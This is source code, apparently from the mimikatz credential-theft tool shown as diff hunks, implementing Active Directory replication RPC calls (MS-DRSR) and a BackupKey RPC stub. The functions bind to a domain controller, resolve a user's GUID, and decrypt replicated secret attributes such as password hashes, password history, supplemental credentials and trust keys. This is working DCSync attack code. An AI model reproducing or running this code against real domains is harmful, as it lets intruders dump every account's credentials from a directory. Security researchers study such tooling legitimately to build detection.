FreeContextBuffer(kull_m_rpc_drsr_g_sKey.SessionKey);
kull_m_rpc_drsr_g_sKey.SessionKeyLength = 0;
kull_m_rpc_drsr_g_sKey.SessionKey = NULL;
}
secStatus = QueryContextAttributes(data, SECPKG_ATTR_SESSION_KEY, (LPVOID) &kull_m_rpc_drsr_g_sKey);
if(secStatus != SEC_E_OK)
PRINT_ERROR(L"QueryContextAttributes %08x\n", secStatus);
}
else PRINT_ERROR(L"I_RpcBindingInqSecurityContext %08x\n", rpcStatus);
}
GUID DRSUAPI_DS_BIND_GUID_Standard = {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
BOOL DomainGUIDfound = FALSE, ObjectGUIDfound = FALSE;
DWORD i;
ULONG drsStatus;
DRS_HANDLE hDrs = NULL;
DRS_MSG_DCINFOREQ dcInfoReq = {0};
DWORD dcOutVersion = 0;
DRS_MSG_DCINFOREPLY dcInfoRep = {0};
LPWSTR sGuid;
UNICODE_STRING uGuid;
RtlZeroMemory(pDrsExtensionsInt, sizeof(DRS_EXTENSIONS_INT));
pDrsExtensionsInt->cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
pDrsExtensionsInt->dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION;
if(kull_m_rpc_drsr_getDCBind(hBinding, &DRSUAPI_DS_BIND_GUID_Standard, &hDrs, pDrsExtensionsInt))
{
RpcTryExcept
{
dcInfoReq.V1.InfoLevel = 2;
dcInfoReq.V1.Domain = (LPWSTR) Domain;
drsStatus = IDL_DRSDomainControllerInfo(hDrs, 1, &dcInfoReq, &dcOutVersion, &dcInfoRep);
if(drsStatus == 0)
{
if(dcOutVersion == 2)
{
for(i = 0; i < dcInfoRep.V2.cItems; i++)
{
if(!DomainGUIDfound && ((_wcsicmp(ServerName, dcInfoRep.V2.rItems[i].DnsHostName) == 0) || (_wcsicmp(ServerName, dcInfoRep.V2.rItems[i].NetbiosName) == 0)))
{
DomainGUIDfound = TRUE;
*DomainGUID = dcInfoRep.V2.rItems[i].NtdsDsaObjectGuid;
}
}
if(!DomainGUIDfound)
PRINT_ERROR(L"DomainControllerInfo: DC \'%s\' not found\n", ServerName);
}
else PRINT_ERROR(L"DomainControllerInfo: bad version (%u)\n", dcOutVersion);
kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(dcOutVersion, &dcInfoRep);
}
else PRINT_ERROR(L"DomainControllerInfo: 0x%08x (%u)\n", drsStatus, drsStatus);
if(Guid)
{
RtlInitUnicodeString(&uGuid, Guid);
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
}
else if(User)
{
if(kull_m_rpc_drsr_CrackName(hDrs, wcschr(User, L'\\') ? DS_NT4_ACCOUNT_NAME : wcschr(User, L'=') ? DS_FQDN_1779_NAME : wcschr(User, L'@') ? DS_USER_PRINCIPAL_NAME : DS_NT4_ACCOUNT_NAME_SANS_DOMAIN, User, DS_UNIQUE_ID_NAME, &sGuid, NULL))
{
RtlInitUnicodeString(&uGuid, sGuid);
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
}
}
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
}
return (DomainGUIDfound && (ObjectGUIDfound || !(Guid || User)));
}
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
BOOL status = FALSE;
ULONG drsStatus;
DRS_EXTENSIONS_INT *pDrsExtensionsOutput = NULL;
RpcTryExcept
{
drsStatus = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) pDrsExtensionsInt, (DRS_EXTENSIONS **) &pDrsExtensionsOutput, hDrs); // to free ?
if(drsStatus == 0)
{
if(pDrsExtensionsOutput)
{
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, SiteObjGuid) - sizeof(DWORD))
{
if(pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
status = TRUE;
else PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", pDrsExtensionsOutput->dwFlags);
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, Pid) - sizeof(DWORD))
{
pDrsExtensionsInt->SiteObjGuid = pDrsExtensionsOutput->SiteObjGuid;
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwFlagsExt) - sizeof(DWORD))
{
pDrsExtensionsInt->dwReplEpoch = pDrsExtensionsOutput->dwReplEpoch;
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, ConfigObjGUID) - sizeof(DWORD))
{
pDrsExtensionsInt->dwExtCaps = MAXDWORD32;
//pDrsExtensionsInt->dwFlagsExt = pDrsExtensionsOutput->dwFlagsExt & (DRS_EXT_RECYCLE_BIN | DRS_EXT_PAM);
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
pDrsExtensionsInt->ConfigObjGUID = pDrsExtensionsOutput->ConfigObjGUID;
}
}
}
}
else PRINT_ERROR(L"Incorrect DRS Extensions Output Size (%u)\n", pDrsExtensionsOutput->cb);
MIDL_user_free(pDrsExtensionsOutput);
}
else PRINT_ERROR(L"No DRS Extensions Output\n");
if(!status)
IDL_DRSUnbind(hDrs);
}
else PRINT_ERROR(L"IDL_DRSBind: %u\n", drsStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
const wchar_t * KULL_M_RPC_DRSR_CrackNames_Error[] = {L"NO_ERROR", L"ERROR_RESOLVING", L"ERROR_NOT_FOUND", L"ERROR_NOT_UNIQUE", L"ERROR_NO_MAPPING", L"ERROR_DOMAIN_ONLY", L"ERROR_NO_SYNTACTICAL_MAPPING", L"ERROR_TRUST_REFERRAL"};
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain)
{
BOOL status = FALSE;
DRS_MSG_CRACKREQ nameCrackReq = {0};
DWORD nameCrackOutVersion = 0, drsStatus;
DRS_MSG_CRACKREPLY nameCrackRep = {0};
nameCrackReq.V1.formatOffered = NameFormat;
nameCrackReq.V1.formatDesired = FormatWanted;
nameCrackReq.V1.cNames = 1;
nameCrackReq.V1.rpNames = (LPWSTR *) &Name;
RpcTryExcept
{
drsStatus = IDL_DRSCrackNames(hDrs, 1, &nameCrackReq, &nameCrackOutVersion, &nameCrackRep);
if(drsStatus == 0)
{
if(nameCrackOutVersion == 1)
{
if(nameCrackRep.V1.pResult->cItems == 1)
{
drsStatus = nameCrackRep.V1.pResult->rItems[0].status;
if(status = (drsStatus == DS_NAME_NO_ERROR))
{
kull_m_string_copy(CrackedName, nameCrackRep.V1.pResult->rItems[0].pName);
kull_m_string_copy(CrackedDomain, nameCrackRep.V1.pResult->rItems[0].pDomain);
}
else PRINT_ERROR(L"CrackNames (name status): 0x%08x (%u) - %s\n", drsStatus, drsStatus, (drsStatus < ARRAYSIZE(KULL_M_RPC_DRSR_CrackNames_Error)) ? KULL_M_RPC_DRSR_CrackNames_Error[drsStatus] : L"?");
}
else PRINT_ERROR(L"CrackNames: no item!\n");
}
else PRINT_ERROR(L"CrackNames: bad version (%u)\n", nameCrackOutVersion);
kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(nameCrackOutVersion, &nameCrackRep);
}
else PRINT_ERROR(L"CrackNames: 0x%08x (%u)\n", drsStatus, drsStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very partial, ofc
{
REPLENTINFLIST * pReplentinflist, *pNextReplentinflist = objects;
DWORD i, j;
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
if(pReplentinflist->Entinf.AttrBlock.pAttr)
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
switch(pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
{
case ATT_CURRENT_VALUE:
case ATT_UNICODE_PWD:
case ATT_NT_PWD_HISTORY:
case ATT_DBCS_PWD:
case ATT_LM_PWD_HISTORY:
case ATT_SUPPLEMENTAL_CREDENTIALS:
case ATT_TRUST_AUTH_INCOMING:
case ATT_TRUST_AUTH_OUTGOING:
// case another :
// case another :
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j]))
return FALSE;
break;
default:
break;
}
}
}
}
return TRUE;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val)
{
BOOL status = FALSE;
PENCRYPTED_PAYLOAD encrypted;
MD5_CTX md5ctx;
CRYPTO_BUFFER cryptoKey = {MD5_DIGEST_LENGTH, MD5_DIGEST_LENGTH, NULL}, cryptoData;
DWORD realLen, calcChecksum;
PVOID toFree;
if(kull_m_rpc_drsr_g_sKey.SessionKey && kull_m_rpc_drsr_g_sKey.SessionKeyLength)
{
if((val->valLen >= (ULONG) FIELD_OFFSET(ENCRYPTED_PAYLOAD, EncryptedData)) && val->pVal)
{
encrypted = (PENCRYPTED_PAYLOAD) val->pVal;
MD5Init(&md5ctx);
MD5Update(&md5ctx, kull_m_rpc_drsr_g_sKey.SessionKey, kull_m_rpc_drsr_g_sKey.SessionKeyLength);
MD5Update(&md5ctx, encrypted->Salt, sizeof(encrypted->Salt));
MD5Final(&md5ctx);
cryptoKey.Buffer = md5ctx.digest;
cryptoData.Length = cryptoData.MaximumLength = val->valLen - FIELD_OFFSET(ENCRYPTED_PAYLOAD, CheckSum);
cryptoData.Buffer = (PBYTE) &encrypted->CheckSum;
if(NT_SUCCESS(RtlEncryptDecryptRC4(&cryptoData, &cryptoKey)))
{
realLen = val->valLen - FIELD_OFFSET(ENCRYPTED_PAYLOAD, EncryptedData);
if(kull_m_crypto_hash(CALG_CRC32, encrypted->EncryptedData, realLen, &calcChecksum, sizeof(calcChecksum)))
{
if(calcChecksum == encrypted->CheckSum)
{
toFree = val->pVal;
if(val->pVal = (UCHAR *) MIDL_user_allocate(realLen))
{
RtlCopyMemory(val->pVal, encrypted->EncryptedData, realLen);
val->valLen = realLen;
status = TRUE;
MIDL_user_free(toFree);
}
}
else PRINT_ERROR(L"Checksums don\'t match (C:0x%08x - R:0x%08x)\n", calcChecksum, encrypted->CheckSum);
}
else PRINT_ERROR(L"Unable to calculate CRC32\n");
}
else PRINT_ERROR(L"RtlEncryptDecryptRC4\n");
}
else PRINT_ERROR(L"No valid data\n");
}
else PRINT_ERROR(L"No Session Key\n");
return status;
}
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply)
{
DWORD i;
if(reply)
{
switch (nameCrackOutVersion)
{
case 1:
if(reply->V1.pResult)
{
for(i = 0; i < reply->V1.pResult->cItems; i++)
{
if(reply->V1.pResult->rItems[i].pDomain)
MIDL_user_free(reply->V1.pResult->rItems[i].pDomain);
if(reply->V1.pResult->rItems[i].pName)
MIDL_user_free(reply->V1.pResult->rItems[i].pName);
}
if(reply->V1.pResult->rItems)
MIDL_user_free(reply->V1.pResult->rItems);
MIDL_user_free(reply->V1.pResult);
}
break;
default:
PRINT_ERROR(L"nameCrackOutVersion not valid (0x%08x - %u)\n", nameCrackOutVersion, nameCrackOutVersion);
break;
}
}
}
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply)
{
DWORD i;
if(reply)
{
switch (dcOutVersion)
{
case 2:
for(i = 0; i < reply->V2.cItems; i++)
{
if(reply->V2.rItems[i].NetbiosName)
MIDL_user_free(reply->V2.rItems[i].NetbiosName);
if(reply->V2.rItems[i].DnsHostName)
MIDL_user_free(reply->V2.rItems[i].DnsHostName);
if(reply->V2.rItems[i].SiteName)
MIDL_user_free(reply->V2.rItems[i].SiteName);
if(reply->V2.rItems[i].SiteObjectName)
MIDL_user_free(reply->V2.rItems[i].SiteObjectName);
if(reply->V2.rItems[i].ComputerObjectName)
MIDL_user_free(reply->V2.rItems[i].ComputerObjectName);
if(reply->V2.rItems[i].ServerObjectName)
MIDL_user_free(reply->V2.rItems[i].ServerObjectName);
if(reply->V2.rItems[i].NtdsDsaObjectName)
MIDL_user_free(reply->V2.rItems[i].NtdsDsaObjectName);
}
if(reply->V2.rItems)
MIDL_user_free(reply->V2.rItems);
break;
case 1:
case 3:
case 0xffffffff:
PRINT_ERROR(L"TODO (maybe?)\n");
break;
default:
PRINT_ERROR(L"dcOutVersion not valid (0x%08x - %u)\n", dcOutVersion, dcOutVersion);
break;
}
}
}
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply)
{
DWORD i, j;
REPLENTINFLIST *pReplentinflist, *pNextReplentinflist;
if(reply)
{
switch(dwOutVersion)
{
case 6:
if(reply->V6.pNC)
MIDL_user_free(reply->V6.pNC);
if(reply->V6.pUpToDateVecSrc)
MIDL_user_free(reply->V6.pUpToDateVecSrc);
if(reply->V6.PrefixTableSrc.pPrefixEntry)
{
for(i = 0; i < reply->V6.PrefixTableSrc.PrefixCount; i++)
if(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements)
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements);
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry);
}
pNextReplentinflist = reply->V6.pObjects;
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
if(pReplentinflist->Entinf.pName)
MIDL_user_free(pReplentinflist->Entinf.pName);
if(pReplentinflist->Entinf.AttrBlock.pAttr)
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
{
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal);
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal);
}
}
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr);
}
if(pReplentinflist->pParentGuid)
MIDL_user_free(pReplentinflist->pParentGuid);
if(pReplentinflist->pMetaDataExt)
MIDL_user_free(pReplentinflist->pMetaDataExt);
MIDL_user_free(pReplentinflist);
}
if(reply->V6.rgValues)
{
for(i = 0; i < reply->V6.cNumValues; i++)
{
if(reply->V6.rgValues[i].pObject)
MIDL_user_free(reply->V6.rgValues[i].pObject);
if(reply->V6.rgValues[i].Aval.pVal)
MIDL_user_free(reply->V6.rgValues[i].Aval.pVal);
}
MIDL_user_free(reply->V6.rgValues);
}
break;
case 1:
case 2:
case 7:
case 9:
PRINT_ERROR(L"TODO (maybe?)\n");
break;
default:
PRINT_ERROR(L"dwOutVersion not valid (0x%08x - %u)\n", dwOutVersion, dwOutVersion);
break;
}
}
}

View File

@ -0,0 +1,205 @@
/* Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com / http://blog.gentilkiwi.com )
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "../kull_m_crypto_system.h"
#include "../kull_m_crypto.h"
#include "../kull_m_string.h"
#include "kull_m_rpc_ms-drsr.h"
typedef struct _DRS_EXTENSIONS_INT {
DWORD cb;
DWORD dwFlags;
GUID SiteObjGuid;
DWORD Pid;
DWORD dwReplEpoch;
DWORD dwFlagsExt;
GUID ConfigObjGUID;
DWORD dwExtCaps;
} DRS_EXTENSIONS_INT, *PDRS_EXTENSIONS_INT;
typedef struct _ENCRYPTED_PAYLOAD {
UCHAR Salt[16];
ULONG CheckSum;
UCHAR EncryptedData[ANYSIZE_ARRAY];
} ENCRYPTED_PAYLOAD, *PENCRYPTED_PAYLOAD;
#define DRS_EXT_BASE 0x00000001
#define DRS_EXT_ASYNCREPL 0x00000002
#define DRS_EXT_REMOVEAPI 0x00000004
#define DRS_EXT_MOVEREQ_V2 0x00000008
#define DRS_EXT_GETCHG_DEFLATE 0x00000010
#define DRS_EXT_DCINFO_V1 0x00000020
#define DRS_EXT_RESTORE_USN_OPTIMIZATION 0x00000040
#define DRS_EXT_ADDENTRY 0x00000080
#define DRS_EXT_KCC_EXECUTE 0x00000100
#define DRS_EXT_ADDENTRY_V2 0x00000200
#define DRS_EXT_LINKED_VALUE_REPLICATION 0x00000400
#define DRS_EXT_DCINFO_V2 0x00000800
#define DRS_EXT_INSTANCE_TYPE_NOT_REQ_ON_MOD 0x00001000
#define DRS_EXT_CRYPTO_BIND 0x00002000
#define DRS_EXT_GET_REPL_INFO 0x00004000
#define DRS_EXT_STRONG_ENCRYPTION 0x00008000
#define DRS_EXT_DCINFO_VFFFFFFFF 0x00010000
#define DRS_EXT_TRANSITIVE_MEMBERSHIP 0x00020000
#define DRS_EXT_ADD_SID_HISTORY 0x00040000
#define DRS_EXT_POST_BETA3 0x00080000
#define DRS_EXT_GETCHGREQ_V5 0x00100000
#define DRS_EXT_GETMEMBERSHIPS2 0x00200000
#define DRS_EXT_GETCHGREQ_V6 0x00400000
#define DRS_EXT_NONDOMAIN_NCS 0x00800000
#define DRS_EXT_GETCHGREQ_V8 0x01000000
#define DRS_EXT_GETCHGREPLY_V5 0x02000000
#define DRS_EXT_GETCHGREPLY_V6 0x04000000
#define DRS_EXT_WHISTLER_BETA3 0x08000000
#define DRS_EXT_W2K3_DEFLATE 0x10000000
#define DRS_EXT_GETCHGREQ_V10 0x20000000
#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART2 0x40000000
#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART3 0x80000000
#define DRS_EXT_ADAM 0x00000001
#define DRS_EXT_LH_BETA2 0x00000002
#define DRS_EXT_RECYCLE_BIN 0x00000004
#define DRS_EXT_GETCHGREPLY_V9 0x00000100
#define DRS_EXT_PAM 0x00000200
#define DRS_ASYNC_OP 0x00000001
#define DRS_GETCHG_CHECK 0x00000002
#define DRS_UPDATE_NOTIFICATION 0x00000002
#define DRS_ADD_REF 0x00000004
#define DRS_SYNC_ALL 0x00000008
#define DRS_DEL_REF 0x00000008
#define DRS_WRIT_REP 0x00000010
#define DRS_INIT_SYNC 0x00000020
#define DRS_PER_SYNC 0x00000040
#define DRS_MAIL_REP 0x00000080
#define DRS_ASYNC_REP 0x00000100
#define DRS_IGNORE_ERROR 0x00000100
#define DRS_TWOWAY_SYNC 0x00000200
#define DRS_CRITICAL_ONLY 0x00000400
#define DRS_GET_ANC 0x00000800
#define DRS_GET_NC_SIZE 0x00001000
#define DRS_LOCAL_ONLY 0x00001000
#define DRS_NONGC_RO_REP 0x00002000
#define DRS_SYNC_BYNAME 0x00004000
#define DRS_REF_OK 0x00004000
#define DRS_FULL_SYNC_NOW 0x00008000
#define DRS_NO_SOURCE 0x00008000
#define DRS_FULL_SYNC_IN_PROGRESS 0x00010000
#define DRS_FULL_SYNC_PACKET 0x00020000
#define DRS_SYNC_REQUEUE 0x00040000
#define DRS_SYNC_URGENT 0x00080000
#define DRS_REF_GCSPN 0x00100000
#define DRS_NO_DISCARD 0x00100000
#define DRS_NEVER_SYNCED 0x00200000
#define DRS_SPECIAL_SECRET_PROCESSING 0x00400000
#define DRS_INIT_SYNC_NOW 0x00800000
#define DRS_PREEMPTED 0x01000000
#define DRS_SYNC_FORCED 0x02000000
#define DRS_DISABLE_AUTO_SYNC 0x04000000
#define DRS_DISABLE_PERIODIC_SYNC 0x08000000
#define DRS_USE_COMPRESSION 0x10000000
#define DRS_NEVER_NOTIFY 0x20000000
#define DRS_SYNC_PAS 0x40000000
#define DRS_GET_ALL_GROUP_MEMBERSHIP 0x80000000
typedef enum {
DS_UNKNOWN_NAME = 0,
DS_FQDN_1779_NAME = 1,
DS_NT4_ACCOUNT_NAME = 2,
DS_DISPLAY_NAME = 3,
DS_UNIQUE_ID_NAME = 6,
DS_CANONICAL_NAME = 7,
DS_USER_PRINCIPAL_NAME = 8,
DS_CANONICAL_NAME_EX = 9,
DS_SERVICE_PRINCIPAL_NAME = 10,
DS_SID_OR_SID_HISTORY_NAME = 11,
DS_DNS_DOMAIN_NAME = 12,
DS_LIST_SITES = -1,
DS_LIST_SERVERS_IN_SITE = -2,
DS_LIST_DOMAINS_IN_SITE = -3,
DS_LIST_SERVERS_FOR_DOMAIN_IN_SITE = -4,
DS_LIST_INFO_FOR_SERVER = -5,
DS_LIST_ROLES = -6,
DS_NT4_ACCOUNT_NAME_SANS_DOMAIN = -7,
DS_MAP_SCHEMA_GUID = -8,
DS_LIST_DOMAINS = -9,
DS_LIST_NCS = -10,
DS_ALT_SECURITY_IDENTITIES_NAME = -11,
DS_STRING_SID_NAME = -12,
DS_LIST_SERVERS_WITH_DCS_IN_SITE = -13,
DS_USER_PRINCIPAL_NAME_FOR_LOGON = -14,
DS_LIST_GLOBAL_CATALOG_SERVERS = -15,
DS_NT4_ACCOUNT_NAME_SANS_DOMAIN_EX = -16,
DS_USER_PRINCIPAL_NAME_AND_ALTSECID = -17,
} DS_NAME_FORMAT;
typedef enum {
DS_NAME_NO_ERROR = 0,
DS_NAME_ERROR_RESOLVING = 1,
DS_NAME_ERROR_NOT_FOUND = 2,
DS_NAME_ERROR_NOT_UNIQUE = 3,
DS_NAME_ERROR_NO_MAPPING = 4,
DS_NAME_ERROR_DOMAIN_ONLY = 5,
DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 6,
DS_NAME_ERROR_TRUST_REFERRAL = 7
} DS_NAME_ERROR;
typedef enum {
EXOP_FSMO_REQ_ROLE = 1,
EXOP_FSMO_REQ_RID_ALLOC = 2,
EXOP_FSMO_RID_REQ_ROLE = 3,
EXOP_FSMO_REQ_PDC = 4,
EXOP_FSMO_ABANDON_ROLE = 5,
EXOP_REPL_OBJ = 6,
EXOP_REPL_SECRETS = 7
} EXOP_REQ;
#define ATT_RDN 589825
#define ATT_OBJECT_SID 589970
#define ATT_WHEN_CREATED 131074
#define ATT_WHEN_CHANGED 131075
#define ATT_SAM_ACCOUNT_NAME 590045
#define ATT_USER_PRINCIPAL_NAME 590480
#define ATT_SERVICE_PRINCIPAL_NAME 590595
#define ATT_SID_HISTORY 590433
#define ATT_USER_ACCOUNT_CONTROL 589832
#define ATT_SAM_ACCOUNT_TYPE 590126
#define ATT_LOGON_HOURS 589888
#define ATT_LOGON_WORKSTATION 589889
#define ATT_LAST_LOGON 589876
#define ATT_PWD_LAST_SET 589920
#define ATT_ACCOUNT_EXPIRES 589983
#define ATT_LOCKOUT_TIME 590486
#define ATT_UNICODE_PWD 589914
#define ATT_NT_PWD_HISTORY 589918
#define ATT_DBCS_PWD 589879
#define ATT_LM_PWD_HISTORY 589984
#define ATT_SUPPLEMENTAL_CREDENTIALS 589949
#define ATT_CURRENT_VALUE 589851
#define ATT_TRUST_ATTRIBUTES 590294
#define ATT_TRUST_AUTH_INCOMING 589953
#define ATT_TRUST_AUTH_OUTGOING 589959
#define ATT_TRUST_DIRECTION 589956
#define ATT_TRUST_PARENT 590295
#define ATT_TRUST_PARTNER 589957
#define ATT_TRUST_TYPE 589960
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context);
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);

View File

@ -0,0 +1,6 @@
#pragma once
#include "kull_m_rpc.h"
const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID;
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam);

View File

@ -0,0 +1,325 @@
#include "kull_m_rpc_ms-bkrp.h"
const GUID
BACKUPKEY_BACKUP_GUID = {0x7f752b10, 0x178e, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}},
BACKUPKEY_RESTORE_GUID_WIN2K = {0x7fe94d50, 0x178e, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}},
BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = {0x018ff48a, 0xeaba, 0x40c6, {0x8f, 0x6d, 0x72, 0x37, 0x02, 0x40, 0xe9, 0x67}},
BACKUPKEY_RESTORE_GUID = {0x47270c64, 0x2fc7, 0x499b, {0xac, 0x5b, 0x0e, 0x37, 0xcd, 0xce, 0x89, 0x9a}};
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#ifdef _M_X64
typedef struct _ms2Dbkrp_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[65];
} ms2Dbkrp_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Dbkrp_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[73];
} ms2Dbkrp_MIDL_PROC_FORMAT_STRING;
extern const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString;
extern const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE BackupKey___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x165d, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static RPC_BINDING_HANDLE BackupKey__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC BackupKey_StubDesc = {(void *) &BackupKey___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &BackupKey__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dbkrp__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam)
{
return (NET_API_STATUS) NdrClientCall2((PMIDL_STUB_DESC) &BackupKey_StubDesc, (PFORMAT_STRING) &ms2Dbkrp__MIDL_ProcFormatString.Format[0], h, pguidActionAgent, pDataIn, cbDataIn, ppDataOut, pcbDataOut, dwParam).Simple;
}
